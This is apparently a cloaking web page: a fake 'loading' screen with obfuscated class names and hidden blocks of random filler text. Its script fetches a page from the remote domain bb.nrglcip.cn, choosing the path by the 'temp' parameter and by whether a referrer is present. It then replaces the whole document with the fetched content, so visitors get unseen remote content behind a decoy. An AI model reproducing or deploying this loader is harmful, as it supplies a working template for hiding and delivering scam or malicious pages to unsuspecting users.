<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SZ2ehvax {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SZ2ehvax .mrKNdxcVJo8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SZ2ehvax .content {
            line-height: 50px;
            text-align: center
        }

        .SZ2ehvax .img {
            width: 100%
        }

        .SZ2ehvax .SwrjM59k8D {
            text-align: center
        }

        .SZ2ehvax .SwrjM59k8D span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SZ2ehvax .SwrjM59k8D span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SZ2ehvax .SwrjM59k8D span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SZ2ehvax .SwrjM59k8D span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SZ2ehvax .SwrjM59k8D span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SZ2ehvax .SwrjM59k8D span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SZ2ehvax .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MpDkAcvQQSpTa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TQCYaju = MpDkAcvQQSpTa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TQCYaju +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TQCYaju +".html?a=share";
		}
		
        mxzbKHA1ep=url+"#"+new Date().getTime();
        mxzbKHA1ep && function() {
            $.get(mxzbKHA1ep, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>fVPP8itjLh1B9aiJzngDCCgcRI5fTtgnzfP3sWLKH3KJqOSoklAK59c3EwahCeIPO5wdpPTCOAjt9LdZ0Eywz03aLDcp</div>
<img  src='' style='display:none'>
<h1 style='display:none' >AMjaINyclvvlN9broVIfYFsOUgeBg8XKw3Veh5xVyKLSiEjjX4mlMU</h1>
<li style='display:none' >WbwYDaZmgxXaQPgSzkW7m08WeuTQGoxxEjfeRKaUPgapkz46jEOOS7iyNQ0oxIhe2r</li>
<div style='display:none'>fVPP8itjLh1B9aiJzngDCCgcRI5fTtgnzfP3sWLKH3KJqOSoklAK59c3EwahCeIPO5wdpPTCOAjt9LdZ0Eywz03aLDcp</div>
<a  href='#' style='display:none'>BM0Ems6SsibidMz2k5D5lMExIFKwvoDDqZ9jIlr0RLuMrfIE3LuefrvL</a>
<h1 style='display:none' >AMjaINyclvvlN9broVIfYFsOUgeBg8XKw3Veh5xVyKLSiEjjX4mlMU</h1>
<li style='display:none' >WbwYDaZmgxXaQPgSzkW7m08WeuTQGoxxEjfeRKaUPgapkz46jEOOS7iyNQ0oxIhe2r</li><div class="SZ2ehvax">
    <div class="mrKNdxcVJo8">
        <div class="SwrjM59k8D">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>RXWUnM90E5Qi</p>
<p  style='display:none'>RXWUnM90E5Qi</p>
<div style='display:none'>pUdHyqp01979Snzj6or342qqN0gRy</div>
<ul style='display:none' >XYOAVrXyZMNnCv5l96tvuY0rSeW1pBplnHWLhghig1MSxCsIwhbDWPb4Bx</ul>
<li style='display:none' >RMSZDsMsyOF3EUrK5A9Y</li>
<img  src='' style='display:none'></body>
</html>